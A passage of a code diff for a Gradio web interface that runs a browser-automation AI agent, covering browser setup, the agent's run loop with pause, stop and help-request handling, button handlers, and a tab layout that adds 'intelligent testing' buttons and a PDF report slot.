|
| 425 |
+
main_llm = await _initialize_llm(
|
| 426 |
+
llm_provider_name,
|
| 427 |
+
llm_model_name,
|
| 428 |
+
llm_temperature,
|
| 429 |
+
llm_base_url,
|
| 430 |
+
llm_api_key,
|
| 431 |
+
ollama_num_ctx if llm_provider_name == "ollama" else None,
|
| 432 |
+
)
|
| 433 |
+
|
| 434 |
+
# Pass the webui_manager instance to the callback when wrapping it
|
| 435 |
+
async def ask_callback_wrapper(
|
| 436 |
+
query: str, browser_context: BrowserContext
|
| 437 |
+
) -> Dict[str, Any]:
|
| 438 |
+
return await _ask_assistant_callback(webui_manager, query, browser_context)
|
| 439 |
+
|
| 440 |
+
if not webui_manager.bu_controller:
|
| 441 |
+
webui_manager.bu_controller = CustomController(
|
| 442 |
+
ask_assistant_callback=ask_callback_wrapper
|
| 443 |
+
)
|
| 444 |
+
await webui_manager.bu_controller.setup_mcp_client(mcp_server_config)
|
| 445 |
+
|
| 446 |
+
# --- 4. Initialize Browser and Context ---
|
| 447 |
+
should_close_browser_on_finish = not keep_browser_open
|
| 448 |
+
|
| 449 |
+
try:
|
| 450 |
+
# Close existing resources if not keeping open
|
| 451 |
+
if not keep_browser_open:
|
| 452 |
+
if webui_manager.bu_browser_context:
|
| 453 |
+
logger.info("Closing previous browser context.")
|
| 454 |
+
await webui_manager.bu_browser_context.close()
|
| 455 |
+
webui_manager.bu_browser_context = None
|
| 456 |
+
if webui_manager.bu_browser:
|
| 457 |
+
logger.info("Closing previous browser.")
|
| 458 |
+
await webui_manager.bu_browser.close()
|
| 459 |
+
webui_manager.bu_browser = None
|
| 460 |
+
|
| 461 |
+
# Create Browser if needed
|
| 462 |
+
if not webui_manager.bu_browser:
|
| 463 |
+
logger.info("Launching new browser instance.")
|
| 464 |
+
extra_args = []
|
| 465 |
+
if use_own_browser:
|
| 466 |
+
browser_binary_path = os.getenv("BROWSER_PATH", None) or browser_binary_path
|
| 467 |
+
if browser_binary_path == "":
|
| 468 |
+
browser_binary_path = None
|
| 469 |
+
browser_user_data = browser_user_data_dir or os.getenv("BROWSER_USER_DATA", None)
|
| 470 |
+
if browser_user_data:
|
| 471 |
+
extra_args += [f"--user-data-dir={browser_user_data}"]
|
| 472 |
+
else:
|
| 473 |
+
browser_binary_path = None
|
| 474 |
+
|
| 475 |
+
webui_manager.bu_browser = CustomBrowser(
|
| 476 |
+
config=BrowserConfig(
|
| 477 |
+
headless=headless,
|
| 478 |
+
disable_security=disable_security,
|
| 479 |
+
browser_binary_path=browser_binary_path,
|
| 480 |
+
extra_browser_args=extra_args,
|
| 481 |
+
wss_url=wss_url,
|
| 482 |
+
cdp_url=cdp_url,
|
| 483 |
+
new_context_config=BrowserContextConfig(
|
| 484 |
+
window_width=window_w,
|
| 485 |
+
window_height=window_h,
|
| 486 |
+
)
|
| 487 |
+
)
|
| 488 |
+
)
|
| 489 |
+
|
| 490 |
+
# Create Context if needed
|
| 491 |
+
if not webui_manager.bu_browser_context:
|
| 492 |
+
logger.info("Creating new browser context.")
|
| 493 |
+
context_config = BrowserContextConfig(
|
| 494 |
+
trace_path=save_trace_path if save_trace_path else None,
|
| 495 |
+
save_recording_path=save_recording_path
|
| 496 |
+
if save_recording_path
|
| 497 |
+
else None,
|
| 498 |
+
save_downloads_path=save_download_path if save_download_path else None,
|
| 499 |
+
window_height=window_h,
|
| 500 |
+
window_width=window_w,
|
| 501 |
+
)
|
| 502 |
+
if not webui_manager.bu_browser:
|
| 503 |
+
raise ValueError("Browser not initialized, cannot create context.")
|
| 504 |
+
webui_manager.bu_browser_context = (
|
| 505 |
+
await webui_manager.bu_browser.new_context(config=context_config)
|
| 506 |
+
)
|
| 507 |
+
|
| 508 |
+
# --- 5. Initialize or Update Agent ---
|
| 509 |
+
webui_manager.bu_agent_task_id = str(uuid.uuid4()) # New ID for this task run
|
| 510 |
+
os.makedirs(
|
| 511 |
+
os.path.join(save_agent_history_path, webui_manager.bu_agent_task_id),
|
| 512 |
+
exist_ok=True,
|
| 513 |
+
)
|
| 514 |
+
history_file = os.path.join(
|
| 515 |
+
save_agent_history_path,
|
| 516 |
+
webui_manager.bu_agent_task_id,
|
| 517 |
+
f"{webui_manager.bu_agent_task_id}.json",
|
| 518 |
+
)
|
| 519 |
+
gif_path = os.path.join(
|
| 520 |
+
save_agent_history_path,
|
| 521 |
+
webui_manager.bu_agent_task_id,
|
| 522 |
+
f"{webui_manager.bu_agent_task_id}.gif",
|
| 523 |
+
)
|
| 524 |
+
|
| 525 |
+
# Pass the webui_manager to callbacks when wrapping them
|
| 526 |
+
async def step_callback_wrapper(
|
| 527 |
+
state: BrowserState, output: AgentOutput, step_num: int
|
| 528 |
+
):
|
| 529 |
+
await _handle_new_step(webui_manager, state, output, step_num)
|
| 530 |
+
|
| 531 |
+
def done_callback_wrapper(history: AgentHistoryList):
|
| 532 |
+
_handle_done(webui_manager, history)
|
| 533 |
+
|
| 534 |
+
if not webui_manager.bu_agent:
|
| 535 |
+
logger.info(f"Initializing new agent for task: {task}")
|
| 536 |
+
if not webui_manager.bu_browser or not webui_manager.bu_browser_context:
|
| 537 |
+
raise ValueError(
|
| 538 |
+
"Browser or Context not initialized, cannot create agent."
|
| 539 |
+
)
|
| 540 |
+
webui_manager.bu_agent = BrowserUseAgent(
|
| 541 |
+
task=task,
|
| 542 |
+
llm=main_llm,
|
| 543 |
+
browser=webui_manager.bu_browser,
|
| 544 |
+
browser_context=webui_manager.bu_browser_context,
|
| 545 |
+
controller=webui_manager.bu_controller,
|
| 546 |
+
register_new_step_callback=step_callback_wrapper,
|
| 547 |
+
register_done_callback=done_callback_wrapper,
|
| 548 |
+
use_vision=use_vision,
|
| 549 |
+
override_system_message=override_system_prompt,
|
| 550 |
+
extend_system_message=extend_system_prompt,
|
| 551 |
+
max_input_tokens=max_input_tokens,
|
| 552 |
+
max_actions_per_step=max_actions,
|
| 553 |
+
tool_calling_method=tool_calling_method,
|
| 554 |
+
planner_llm=planner_llm,
|
| 555 |
+
use_vision_for_planner=planner_use_vision if planner_llm else False,
|
| 556 |
+
source="webui",
|
| 557 |
+
)
|
| 558 |
+
webui_manager.bu_agent.state.agent_id = webui_manager.bu_agent_task_id
|
| 559 |
+
webui_manager.bu_agent.settings.generate_gif = gif_path
|
| 560 |
+
else:
|
| 561 |
+
webui_manager.bu_agent.state.agent_id = webui_manager.bu_agent_task_id
|
| 562 |
+
webui_manager.bu_agent.add_new_task(task)
|
| 563 |
+
webui_manager.bu_agent.settings.generate_gif = gif_path
|
| 564 |
+
webui_manager.bu_agent.browser = webui_manager.bu_browser
|
| 565 |
+
webui_manager.bu_agent.browser_context = webui_manager.bu_browser_context
|
| 566 |
+
webui_manager.bu_agent.controller = webui_manager.bu_controller
|
| 567 |
+
|
| 568 |
+
# --- 6. Run Agent Task and Stream Updates ---
|
| 569 |
+
agent_run_coro = webui_manager.bu_agent.run(max_steps=max_steps)
|
| 570 |
+
agent_task = asyncio.create_task(agent_run_coro)
|
| 571 |
+
webui_manager.bu_current_task = agent_task # Store the task
|
| 572 |
+
|
| 573 |
+
last_chat_len = len(webui_manager.bu_chat_history)
|
| 574 |
+
while not agent_task.done():
|
| 575 |
+
is_paused = webui_manager.bu_agent.state.paused
|
| 576 |
+
is_stopped = webui_manager.bu_agent.state.stopped
|
| 577 |
+
|
| 578 |
+
# Check for pause state
|
| 579 |
+
if is_paused:
|
| 580 |
+
yield {
|
| 581 |
+
pause_resume_button_comp: gr.update(
|
| 582 |
+
value="▶️ Resume", interactive=True
|
| 583 |
+
),
|
| 584 |
+
stop_button_comp: gr.update(interactive=True),
|
| 585 |
+
}
|
| 586 |
+
# Wait until pause is released or task is stopped/done
|
| 587 |
+
while is_paused and not agent_task.done():
|
| 588 |
+
# Re-check agent state in loop
|
| 589 |
+
is_paused = webui_manager.bu_agent.state.paused
|
| 590 |
+
is_stopped = webui_manager.bu_agent.state.stopped
|
| 591 |
+
if is_stopped: # Stop signal received while paused
|
| 592 |
+
break
|
| 593 |
+
await asyncio.sleep(0.2)
|
| 594 |
+
|
| 595 |
+
if (
|
| 596 |
+
agent_task.done() or is_stopped
|
| 597 |
+
): # If stopped or task finished while paused
|
| 598 |
+
break
|
| 599 |
+
|
| 600 |
+
# If resumed, yield UI update
|
| 601 |
+
yield {
|
| 602 |
+
pause_resume_button_comp: gr.update(
|
| 603 |
+
value="⏸️ Pause", interactive=True
|
| 604 |
+
),
|
| 605 |
+
run_button_comp: gr.update(
|
| 606 |
+
value="⏳ Running...", interactive=False
|
| 607 |
+
),
|
| 608 |
+
}
|
| 609 |
+
|
| 610 |
+
# Check if agent stopped itself or stop button was pressed (which sets agent.state.stopped)
|
| 611 |
+
if is_stopped:
|
| 612 |
+
logger.info("Agent has stopped (internally or via stop button).")
|
| 613 |
+
if not agent_task.done():
|
| 614 |
+
# Ensure the task coroutine finishes if agent just set flag
|
| 615 |
+
try:
|
| 616 |
+
await asyncio.wait_for(
|
| 617 |
+
agent_task, timeout=1.0
|
| 618 |
+
) # Give it a moment to exit run()
|
| 619 |
+
except asyncio.TimeoutError:
|
| 620 |
+
logger.warning(
|
| 621 |
+
"Agent task did not finish quickly after stop signal, cancelling."
|
| 622 |
+
)
|
| 623 |
+
agent_task.cancel()
|
| 624 |
+
except Exception: # Catch task exceptions if it errors on stop
|
| 625 |
+
pass
|
| 626 |
+
break # Exit the streaming loop
|
| 627 |
+
|
| 628 |
+
# Check if agent is asking for help (via response_event)
|
| 629 |
+
update_dict = {}
|
| 630 |
+
if webui_manager.bu_response_event is not None:
|
| 631 |
+
update_dict = {
|
| 632 |
+
user_input_comp: gr.update(
|
| 633 |
+
placeholder="Agent needs help. Enter response and submit.",
|
| 634 |
+
interactive=True,
|
| 635 |
+
),
|
| 636 |
+
run_button_comp: gr.update(
|
| 637 |
+
value="✔️ Submit Response", interactive=True
|
| 638 |
+
),
|
| 639 |
+
pause_resume_button_comp: gr.update(interactive=False),
|
| 640 |
+
stop_button_comp: gr.update(interactive=False),
|
| 641 |
+
chatbot_comp: gr.update(value=webui_manager.bu_chat_history),
|
| 642 |
+
}
|
| 643 |
+
last_chat_len = len(webui_manager.bu_chat_history)
|
| 644 |
+
yield update_dict
|
| 645 |
+
# Wait until response is submitted or task finishes
|
| 646 |
+
await webui_manager.bu_response_event.wait()
|
| 647 |
+
|
| 648 |
+
# Restore UI after response submitted or if task ended unexpectedly
|
| 649 |
+
if not agent_task.done():
|
| 650 |
+
yield {
|
| 651 |
+
user_input_comp: gr.update(
|
| 652 |
+
placeholder="Agent is running...", interactive=False
|
| 653 |
+
),
|
| 654 |
+
run_button_comp: gr.update(
|
| 655 |
+
value="⏳ Running...", interactive=False
|
| 656 |
+
),
|
| 657 |
+
pause_resume_button_comp: gr.update(interactive=True),
|
| 658 |
+
stop_button_comp: gr.update(interactive=True),
|
| 659 |
+
}
|
| 660 |
+
else:
|
| 661 |
+
break # Task finished while waiting for response
|
| 662 |
+
|
| 663 |
+
# Update Chatbot if new messages arrived via callbacks
|
| 664 |
+
if len(webui_manager.bu_chat_history) > last_chat_len:
|
| 665 |
+
update_dict[chatbot_comp] = gr.update(
|
| 666 |
+
value=webui_manager.bu_chat_history
|
| 667 |
+
)
|
| 668 |
+
last_chat_len = len(webui_manager.bu_chat_history)
|
| 669 |
+
|
| 670 |
+
# Update Browser View
|
| 671 |
+
if headless and webui_manager.bu_browser_context:
|
| 672 |
+
try:
|
| 673 |
+
screenshot_b64 = (
|
| 674 |
+
await webui_manager.bu_browser_context.take_screenshot()
|
| 675 |
+
)
|
| 676 |
+
if screenshot_b64:
|
| 677 |
+
html_content = f'<img src="data:image/jpeg;base64,{screenshot_b64}" style="width:{stream_vw}vw; height:{stream_vh}vh ; border:1px solid #ccc;">'
|
| 678 |
+
update_dict[browser_view_comp] = gr.update(
|
| 679 |
+
value=html_content, visible=True
|
| 680 |
+
)
|
| 681 |
+
else:
|
| 682 |
+
html_content = f"<h1 style='width:{stream_vw}vw; height:{stream_vh}vh'>Waiting for browser session...</h1>"
|
| 683 |
+
update_dict[browser_view_comp] = gr.update(
|
| 684 |
+
value=html_content, visible=True
|
| 685 |
+
)
|
| 686 |
+
except Exception as e:
|
| 687 |
+
logger.debug(f"Failed to capture screenshot: {e}")
|
| 688 |
+
update_dict[browser_view_comp] = gr.update(
|
| 689 |
+
value="<div style='...'>Error loading view...</div>",
|
| 690 |
+
visible=True,
|
| 691 |
+
)
|
| 692 |
+
else:
|
| 693 |
+
update_dict[browser_view_comp] = gr.update(visible=False)
|
| 694 |
+
|
| 695 |
+
# Yield accumulated updates
|
| 696 |
+
if update_dict:
|
| 697 |
+
yield update_dict
|
| 698 |
+
|
| 699 |
+
await asyncio.sleep(0.1) # Polling interval
|
| 700 |
+
|
| 701 |
+
# --- 7. Task Finalization ---
|
| 702 |
+
webui_manager.bu_agent.state.paused = False
|
| 703 |
+
webui_manager.bu_agent.state.stopped = False
|
| 704 |
+
final_update = {}
|
| 705 |
+
try:
|
| 706 |
+
logger.info("Agent task completing...")
|
| 707 |
+
# Await the task ensure completion and catch exceptions if not already caught
|
| 708 |
+
if not agent_task.done():
|
| 709 |
+
await agent_task # Retrieve result/exception
|
| 710 |
+
elif agent_task.exception(): # Check if task finished with exception
|
| 711 |
+
agent_task.result() # Raise the exception to be caught below
|
| 712 |
+
logger.info("Agent task completed processing.")
|
| 713 |
+
|
| 714 |
+
logger.info(f"Explicitly saving agent history to: {history_file}")
|
| 715 |
+
webui_manager.bu_agent.save_history(history_file)
|
| 716 |
+
|
| 717 |
+
if os.path.exists(history_file):
|
| 718 |
+
final_update[history_file_comp] = gr.File(value=history_file)
|
| 719 |
+
|
| 720 |
+
if gif_path and os.path.exists(gif_path):
|
| 721 |
+
logger.info(f"GIF found at: {gif_path}")
|
| 722 |
+
final_update[gif_comp] = gr.Image(value=gif_path)
|
| 723 |
+
|
| 724 |
+
except asyncio.CancelledError:
|
| 725 |
+
logger.info("Agent task was cancelled.")
|
| 726 |
+
if not any(
|
| 727 |
+
"Cancelled" in msg.get("content", "")
|
| 728 |
+
for msg in webui_manager.bu_chat_history
|
| 729 |
+
if msg.get("role") == "assistant"
|
| 730 |
+
):
|
| 731 |
+
webui_manager.bu_chat_history.append(
|
| 732 |
+
{"role": "assistant", "content": "**Task Cancelled**."}
|
| 733 |
+
)
|
| 734 |
+
final_update[chatbot_comp] = gr.update(value=webui_manager.bu_chat_history)
|
| 735 |
+
except Exception as e:
|
| 736 |
+
logger.error(f"Error during agent execution: {e}", exc_info=True)
|
| 737 |
+
error_message = (
|
| 738 |
+
f"**Agent Execution Error:**\n```\n{type(e).__name__}: {e}\n```"
|
| 739 |
+
)
|
| 740 |
+
if not any(
|
| 741 |
+
error_message in msg.get("content", "")
|
| 742 |
+
for msg in webui_manager.bu_chat_history
|
| 743 |
+
if msg.get("role") == "assistant"
|
| 744 |
+
):
|
| 745 |
+
webui_manager.bu_chat_history.append(
|
| 746 |
+
{"role": "assistant", "content": error_message}
|
| 747 |
+
)
|
| 748 |
+
final_update[chatbot_comp] = gr.update(value=webui_manager.bu_chat_history)
|
| 749 |
+
gr.Error(f"Agent execution failed: {e}")
|
| 750 |
+
|
| 751 |
+
finally:
|
| 752 |
+
webui_manager.bu_current_task = None # Clear the task reference
|
| 753 |
+
|
| 754 |
+
# Close browser/context if requested
|
| 755 |
+
if should_close_browser_on_finish:
|
| 756 |
+
if webui_manager.bu_browser_context:
|
| 757 |
+
logger.info("Closing browser context after task.")
|
| 758 |
+
await webui_manager.bu_browser_context.close()
|
| 759 |
+
webui_manager.bu_browser_context = None
|
| 760 |
+
if webui_manager.bu_browser:
|
| 761 |
+
logger.info("Closing browser after task.")
|
| 762 |
+
await webui_manager.bu_browser.close()
|
| 763 |
+
webui_manager.bu_browser = None
|
| 764 |
+
|
| 765 |
+
# --- 8. Final UI Update ---
|
| 766 |
+
final_update.update(
|
| 767 |
+
{
|
| 768 |
+
user_input_comp: gr.update(
|
| 769 |
+
value="",
|
| 770 |
+
interactive=True,
|
| 771 |
+
placeholder="Enter your next task...",
|
| 772 |
+
),
|
| 773 |
+
run_button_comp: gr.update(value="▶️ Submit Task", interactive=True),
|
| 774 |
+
stop_button_comp: gr.update(value="⏹️ Stop", interactive=False),
|
| 775 |
+
pause_resume_button_comp: gr.update(
|
| 776 |
+
value="⏸️ Pause", interactive=False
|
| 777 |
+
),
|
| 778 |
+
clear_button_comp: gr.update(interactive=True),
|
| 779 |
+
# Ensure final chat history is shown
|
| 780 |
+
chatbot_comp: gr.update(value=webui_manager.bu_chat_history),
|
| 781 |
+
}
|
| 782 |
+
)
|
| 783 |
+
yield final_update
|
| 784 |
+
|
| 785 |
+
except Exception as e:
|
| 786 |
+
# Catch errors during setup (before agent run starts)
|
| 787 |
+
logger.error(f"Error setting up agent task: {e}", exc_info=True)
|
| 788 |
+
webui_manager.bu_current_task = None # Ensure state is reset
|
| 789 |
+
yield {
|
| 790 |
+
user_input_comp: gr.update(
|
| 791 |
+
interactive=True, placeholder="Error during setup. Enter task..."
|
| 792 |
+
),
|
| 793 |
+
run_button_comp: gr.update(value="▶️ Submit Task", interactive=True),
|
| 794 |
+
stop_button_comp: gr.update(value="⏹️ Stop", interactive=False),
|
| 795 |
+
pause_resume_button_comp: gr.update(value="⏸️ Pause", interactive=False),
|
| 796 |
+
clear_button_comp: gr.update(interactive=True),
|
| 797 |
+
chatbot_comp: gr.update(
|
| 798 |
+
value=webui_manager.bu_chat_history
|
| 799 |
+
+ [{"role": "assistant", "content": f"**Setup Error:** {e}"}]
|
| 800 |
+
),
|
| 801 |
+
}
|
| 802 |
+
|
| 803 |
+
|
| 804 |
+
# --- Button Click Handlers --- (Need access to webui_manager)
|
| 805 |
+
|
| 806 |
+
|
| 807 |
+
async def handle_submit(
|
| 808 |
+
webui_manager: WebuiManager, components: Dict[gr.components.Component, Any]
|
| 809 |
+
):
|
| 810 |
+
"""Handles clicks on the main 'Submit' button."""
|
| 811 |
+
user_input_comp = webui_manager.get_component_by_id("browser_use_agent.user_input")
|
| 812 |
+
user_input_value = components.get(user_input_comp, "").strip()
|
| 813 |
+
|
| 814 |
+
# Check if waiting for user assistance
|
| 815 |
+
if webui_manager.bu_response_event and not webui_manager.bu_response_event.is_set():
|
| 816 |
+
logger.info(f"User submitted assistance: {user_input_value}")
|
| 817 |
+
webui_manager.bu_user_help_response = (
|
| 818 |
+
user_input_value if user_input_value else "User provided no text response."
|
| 819 |
+
)
|
| 820 |
+
webui_manager.bu_response_event.set()
|
| 821 |
+
# UI updates handled by the main loop reacting to the event being set
|
| 822 |
+
yield {
|
| 823 |
+
user_input_comp: gr.update(
|
| 824 |
+
value="",
|
| 825 |
+
interactive=False,
|
| 826 |
+
placeholder="Waiting for agent to continue...",
|
| 827 |
+
),
|
| 828 |
+
webui_manager.get_component_by_id(
|
| 829 |
+
"browser_use_agent.run_button"
|
| 830 |
+
): gr.update(value="⏳ Running...", interactive=False),
|
| 831 |
+
}
|
| 832 |
+
# Check if a task is currently running (using _current_task)
|
| 833 |
+
elif webui_manager.bu_current_task and not webui_manager.bu_current_task.done():
|
| 834 |
+
logger.warning(
|
| 835 |
+
"Submit button clicked while agent is already running and not asking for help."
|
| 836 |
+
)
|
| 837 |
+
gr.Info("Agent is currently running. Please wait or use Stop/Pause.")
|
| 838 |
+
yield {} # No change
|
| 839 |
+
else:
|
| 840 |
+
# Handle submission for a new task
|
| 841 |
+
logger.info("Submit button clicked for new task.")
|
| 842 |
+
# Use async generator to stream updates from run_agent_task
|
| 843 |
+
async for update in run_agent_task(webui_manager, components):
|
| 844 |
+
yield update
|
| 845 |
+
|
| 846 |
+
|
| 847 |
+
async def handle_stop(webui_manager: WebuiManager):
|
| 848 |
+
"""Handles clicks on the 'Stop' button."""
|
| 849 |
+
logger.info("Stop button clicked.")
|
| 850 |
+
agent = webui_manager.bu_agent
|
| 851 |
+
task = webui_manager.bu_current_task
|
| 852 |
+
|
| 853 |
+
if agent and task and not task.done():
|
| 854 |
+
# Signal the agent to stop by setting its internal flag
|
| 855 |
+
agent.state.stopped = True
|
| 856 |
+
agent.state.paused = False # Ensure not paused if stopped
|
| 857 |
+
return {
|
| 858 |
+
webui_manager.get_component_by_id(
|
| 859 |
+
"browser_use_agent.stop_button"
|
| 860 |
+
): gr.update(interactive=False, value="⏹️ Stopping..."),
|
| 861 |
+
webui_manager.get_component_by_id(
|
| 862 |
+
"browser_use_agent.pause_resume_button"
|
| 863 |
+
): gr.update(interactive=False),
|
| 864 |
+
webui_manager.get_component_by_id(
|
| 865 |
+
"browser_use_agent.run_button"
|
| 866 |
+
): gr.update(interactive=False),
|
| 867 |
+
}
|
| 868 |
+
else:
|
| 869 |
+
logger.warning("Stop clicked but agent is not running or task is already done.")
|
| 870 |
+
# Reset UI just in case it's stuck
|
| 871 |
+
return {
|
| 872 |
+
webui_manager.get_component_by_id(
|
| 873 |
+
"browser_use_agent.run_button"
|
| 874 |
+
): gr.update(interactive=True),
|
| 875 |
+
webui_manager.get_component_by_id(
|
| 876 |
+
"browser_use_agent.stop_button"
|
| 877 |
+
): gr.update(interactive=False),
|
| 878 |
+
webui_manager.get_component_by_id(
|
| 879 |
+
"browser_use_agent.pause_resume_button"
|
| 880 |
+
): gr.update(interactive=False),
|
| 881 |
+
webui_manager.get_component_by_id(
|
| 882 |
+
"browser_use_agent.clear_button"
|
| 883 |
+
): gr.update(interactive=True),
|
| 884 |
+
}
|
| 885 |
+
|
| 886 |
+
|
| 887 |
+
async def handle_pause_resume(webui_manager: WebuiManager):
|
| 888 |
+
"""Handles clicks on the 'Pause/Resume' button."""
|
| 889 |
+
agent = webui_manager.bu_agent
|
| 890 |
+
task = webui_manager.bu_current_task
|
| 891 |
+
|
| 892 |
+
if agent and task and not task.done():
|
| 893 |
+
if agent.state.paused:
|
| 894 |
+
logger.info("Resume button clicked.")
|
| 895 |
+
agent.resume()
|
| 896 |
+
# UI update happens in main loop
|
| 897 |
+
return {
|
| 898 |
+
webui_manager.get_component_by_id(
|
| 899 |
+
"browser_use_agent.pause_resume_button"
|
| 900 |
+
): gr.update(value="⏸️ Pause", interactive=True)
|
| 901 |
+
} # Optimistic update
|
| 902 |
+
else:
|
| 903 |
+
logger.info("Pause button clicked.")
|
| 904 |
+
agent.pause()
|
| 905 |
+
return {
|
| 906 |
+
webui_manager.get_component_by_id(
|
| 907 |
+
"browser_use_agent.pause_resume_button"
|
| 908 |
+
): gr.update(value="▶️ Resume", interactive=True)
|
| 909 |
+
} # Optimistic update
|
| 910 |
+
else:
|
| 911 |
+
logger.warning(
|
| 912 |
+
"Pause/Resume clicked but agent is not running or doesn't support state."
|
| 913 |
+
)
|
| 914 |
+
return {} # No change
|
| 915 |
+
|
| 916 |
+
|
| 917 |
+
async def handle_clear(webui_manager: WebuiManager):
|
| 918 |
+
"""Handles clicks on the 'Clear' button."""
|
| 919 |
+
logger.info("Clear button clicked.")
|
| 920 |
+
|
| 921 |
+
# Stop any running task first
|
| 922 |
+
task = webui_manager.bu_current_task
|
| 923 |
+
if task and not task.done():
|
| 924 |
+
logger.info("Clearing requires stopping the current task.")
|
| 925 |
+
webui_manager.bu_agent.stop()
|
| 926 |
+
task.cancel()
|
| 927 |
+
try:
|
| 928 |
+
await asyncio.wait_for(task, timeout=2.0) # Wait briefly
|
| 929 |
+
except (asyncio.CancelledError, asyncio.TimeoutError):
|
| 930 |
+
pass
|
| 931 |
+
except Exception as e:
|
| 932 |
+
logger.warning(f"Error stopping task on clear: {e}")
|
| 933 |
+
webui_manager.bu_current_task = None
|
| 934 |
+
|
| 935 |
+
if webui_manager.bu_controller:
|
| 936 |
+
await webui_manager.bu_controller.close_mcp_client()
|
| 937 |
+
webui_manager.bu_controller = None
|
| 938 |
+
webui_manager.bu_agent = None
|
| 939 |
+
|
| 940 |
+
# Reset state stored in manager
|
| 941 |
+
webui_manager.bu_chat_history = []
|
| 942 |
+
webui_manager.bu_response_event = None
|
| 943 |
+
webui_manager.bu_user_help_response = None
|
| 944 |
+
webui_manager.bu_agent_task_id = None
|
| 945 |
+
|
| 946 |
+
logger.info("Agent state and browser resources cleared.")
|
| 947 |
+
|
| 948 |
+
# Reset UI components
|
| 949 |
+
return {
|
| 950 |
+
webui_manager.get_component_by_id("browser_use_agent.chatbot"): gr.update(
|
| 951 |
+
value=[]
|
| 952 |
+
),
|
| 953 |
+
webui_manager.get_component_by_id("browser_use_agent.user_input"): gr.update(
|
| 954 |
+
value="", placeholder="Enter your task here..."
|
| 955 |
+
),
|
| 956 |
+
webui_manager.get_component_by_id(
|
| 957 |
+
"browser_use_agent.agent_history_file"
|
| 958 |
+
): gr.update(value=None),
|
| 959 |
+
webui_manager.get_component_by_id("browser_use_agent.recording_gif"): gr.update(
|
| 960 |
+
value=None
|
| 961 |
+
),
|
| 962 |
+
webui_manager.get_component_by_id("browser_use_agent.browser_view"): gr.update(
|
| 963 |
+
value="<div style='...'>Browser Cleared</div>"
|
| 964 |
+
),
|
| 965 |
+
webui_manager.get_component_by_id("browser_use_agent.run_button"): gr.update(
|
| 966 |
+
value="▶️ Submit Task", interactive=True
|
| 967 |
+
),
|
| 968 |
+
webui_manager.get_component_by_id("browser_use_agent.stop_button"): gr.update(
|
| 969 |
+
interactive=False
|
| 970 |
+
),
|
| 971 |
+
webui_manager.get_component_by_id(
|
| 972 |
+
"browser_use_agent.pause_resume_button"
|
| 973 |
+
): gr.update(value="⏸️ Pause", interactive=False),
|
| 974 |
+
webui_manager.get_component_by_id("browser_use_agent.clear_button"): gr.update(
|
| 975 |
+
interactive=True
|
| 976 |
+
),
|
| 977 |
+
}
|
| 978 |
+
|
| 979 |
+
|
| 980 |
+
# --- Tab Creation Function ---
|
| 981 |
+
|
| 982 |
+
|
| 983 |
+
def create_browser_use_agent_tab(webui_manager: WebuiManager):
|
| 984 |
+
"""
|
| 985 |
+
Create the run agent tab, defining UI, state, and handlers.
|
| 986 |
+
"""
|
| 987 |
+
webui_manager.init_browser_use_agent()
|
| 988 |
+
|
| 989 |
+
# --- Define UI Components ---
|
| 990 |
+
tab_components = {}
|
| 991 |
+
with gr.Column():
|
| 992 |
+
chatbot = gr.Chatbot(
|
| 993 |
+
lambda: webui_manager.bu_chat_history, # Load history dynamically
|
| 994 |
+
elem_id="browser_use_chatbot",
|
| 995 |
+
label="Agent Interaction",
|
| 996 |
+
type="messages",
|
| 997 |
+
height=600,
|
| 998 |
+
show_copy_button=True,
|
| 999 |
+
)
|
| 1000 |
+
user_input = gr.Textbox(
|
| 1001 |
+
label="Your Task or Response",
|
| 1002 |
+
placeholder="Enter your task here or provide assistance when asked.",
|
| 1003 |
+
lines=3,
|
| 1004 |
+
interactive=True,
|
| 1005 |
+
elem_id="user_input",
|
| 1006 |
+
)
|
| 1007 |
+
with gr.Row():
|
| 1008 |
+
stop_button = gr.Button(
|
| 1009 |
+
"⏹️ Stop", interactive=False, variant="stop", scale=2
|
| 1010 |
+
)
|
| 1011 |
+
pause_resume_button = gr.Button(
|
| 1012 |
+
"⏸️ Pause", interactive=False, variant="secondary", scale=2, visible=True
|
| 1013 |
+
)
|
| 1014 |
+
clear_button = gr.Button(
|
| 1015 |
+
"🗑️ Clear", interactive=True, variant="secondary", scale=2
|
| 1016 |
+
)
|
| 1017 |
+
run_button = gr.Button("▶️ Submit Task", variant="primary", scale=3)
|
| 1018 |
+
|
| 1019 |
+
# Intelligent Testing Section
|
| 1020 |
+
gr.Markdown("### 🧠 Intelligent Testing Features")
|
| 1021 |
+
with gr.Row():
|
| 1022 |
+
intelligent_form_test_btn = gr.Button(
|
| 1023 |
+
"🔍 Smart Form Testing",
|
| 1024 |
+
variant="secondary",
|
| 1025 |
+
scale=2,
|
| 1026 |
+
interactive=True
|
| 1027 |
+
)
|
| 1028 |
+
intelligent_credential_test_btn = gr.Button(
|
| 1029 |
+
"🔐 Smart Credential Testing",
|
| 1030 |
+
variant="secondary",
|
| 1031 |
+
scale=2,
|
| 1032 |
+
interactive=True
|
| 1033 |
+
)
|
| 1034 |
+
ai_analysis_btn = gr.Button(
|
| 1035 |
+
"🤔 AI Page Analysis",
|
| 1036 |
+
variant="secondary",
|
| 1037 |
+
scale=2,
|
| 1038 |
+
interactive=True
|
| 1039 |
+
)
|
| 1040 |
+
with gr.Row():
|
| 1041 |
+
comprehensive_test_btn = gr.Button(
|
| 1042 |
+
"🎯 Comprehensive Intelligent Testing",
|
| 1043 |
+
variant="primary",
|
| 1044 |
+
scale=3,
|
| 1045 |
+
interactive=True
|
| 1046 |
+
)
|
| 1047 |
+
|
| 1048 |
+
browser_view = gr.HTML(
|
| 1049 |
+
value="<div style='width:100%; height:50vh; display:flex; justify-content:center; align-items:center; border:1px solid #ccc; background-color:#f0f0f0;'><p>Browser View (Requires Headless=True)</p></div>",
|
| 1050 |
+
label="Browser Live View",
|
| 1051 |
+
elem_id="browser_view",
|
| 1052 |
+
visible=False,
|
| 1053 |
+
)
|
| 1054 |
+
with gr.Column():
|
| 1055 |
+
gr.Markdown("### Task Outputs")
|
| 1056 |
+
agent_history_file = gr.File(label="Agent History JSON", interactive=False)
|
| 1057 |
+
recording_gif = gr.Image(
|
| 1058 |
+
label="Task Recording GIF",
|
| 1059 |
+
format="gif",
|
| 1060 |
+
interactive=False,
|
| 1061 |
+
type="filepath",
|
| 1062 |
+
)
|
| 1063 |
+
|
| 1064 |
+
# Auto-generated PDF Report Section
|
| 1065 |
+
gr.Markdown("### 📊 Auto-Generated PDF Report")
|
| 1066 |
+
auto_pdf_report = gr.File(
|
| 1067 |
+
label="📄 Testing Report (PDF)",
|
| 1068 |
+
interactive=False,
|
| 1069 |
+
visible=False
|
| 1070 |
+
)
|
